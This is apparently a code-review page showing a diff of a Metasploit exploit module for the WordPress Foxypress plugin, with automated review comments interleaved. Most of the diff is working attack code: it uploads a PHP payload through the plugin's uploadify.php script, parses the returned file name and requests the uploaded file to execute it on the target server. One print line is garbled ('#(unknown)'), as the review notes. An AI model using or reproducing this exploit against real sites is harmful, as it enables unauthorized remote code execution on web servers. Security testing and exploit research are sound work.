diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index 659b419572..1060354113 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -80,4 +80,25 @@ module Msf::HTTP::Wordpress::URIs
 normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
 end
 
+ # Returns the Wordpress wp-content dir URL
+ #
+ # @return [String] Wordpress wp-content dir URL
+ def wordpress_url_wp_content
+ normalize_uri(target_uri.path, wp_content_dir)
+ end
+
+ # Returns the Wordpress plugins dir URL
+ #
+ # @return [String] Wordpress plugins dir URL
+ def wordpress_url_plugins
+ normalize_uri(wordpress_url_wp_content, 'plugins')
+ end
+
+ # Returns the Wordpress themes dir URL
+ #
+ # @return [String] Wordpress themes dir URL
+ def wordpress_url_themes
+ normalize_uri(wordpress_url_wp_content, 'themes')
+ end
+
 end
diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index e769b8c993..ac738016b1 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -8,17 +8,19 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper def initialize(info = {}) - super(update_info(info, + super(update_info( + info, 'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution', - 'Description' => %q{ + 'Description' => %q( This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable. - }, + ), 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC 
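Review bot: The three new helpers all derive from `wp_content_dir`, which is not defined in this hunk, and the YARD comments do not say where that directory name comes from (presumably a datastore option or a fixed default elsewhere in the mixin — confirm), so a reader of `wordpress_url_wp_content` cannot tell whether the result is user-configurable. Suggest making the dependency explicit in the first comment: `# @return [String] Wordpress wp-content dir URL, built from +wp_content_dir+`. The product name is spelled `Wordpress` in all three comments while the exploit module's metadata uses `WordPress`; worth aligning while the comments are new.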
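Review bot: The explicit `include Msf::Exploit::Remote::HttpClient` is dropped in favour of `include Msf::HTTP::Wordpress`, so `send_request_cgi`, `target_uri` and the `peer` helper used later in this module now rely on that mixin pulling HttpClient in itself; that is not visible in this diff, so please confirm it does, or keep the explicit include, which is harmless. The switch from `%q{` to `%q(` for the description is fine as long as the text stays free of unbalanced parentheses, which it currently is.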
@@ -27,79 +29,56 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['EDB', '18991'], - ['OSVDB', '82652'], - ['BID', '53805'], + %w(EDB 18991), + %w(OSVDB 82652), + %w(BID 53805) ], 'Privileged' => false, - 'Payload' => - { - 'Compat' => - { - 'ConnectionType' => 'find', - }, - }, 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Targets' => [['Foxypress <= 0.4.2.1', {}]], 'DisclosureDate' => 'Jun 05 2012', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]), - ], self.class) end def check - uri = target_uri.path - - res = send_request_cgi({ + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php") - }) + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php') + ) - if res and res.code == 200 - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end + return Exploit::CheckCode::Detected if res && res.code == 200 + + Exploit::CheckCode::Safe end def exploit - - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' - - peer = "#{rhost}:#{rport}" - post_data = Rex::MIME::Message.new - post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") + post_data.add_part("", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending PHP payload") - res = send_request_cgi({ + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"), - 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'), + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' 
=> post_data.to_s - }) + ) - if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ + if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end - print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") - res = send_request_cgi({ + filename = "#{Regexp.last_match[1]}.php" + + print_good("#{peer} - Our payload is at: #(unknown). Calling payload...") + register_files_for_cleanup(filename) + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php") - }) - - if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") - end + 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) + ) + print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 end - end
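Review bot: The new `print_good` line reads `Our payload is at: #(unknown). Calling payload...`, i.e. as shown here it prints the literal text `#(unknown)` rather than the uploaded file name, whereas the removed line printed `#{$1}.php`; unless that is a rendering artifact of this page, it should be `print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")`. The regex on the rewritten `if res.nil? || ...` line keeps needless escapes (`\"`, `\:`, `\,`) that hurt readability; `/\{"raw_file_name":"(\w+)",/` matches the same input. `Regexp.last_match[1]` would also read more idiomatically as `Regexp.last_match(1)`. The `exploit` method closes inside this hunk.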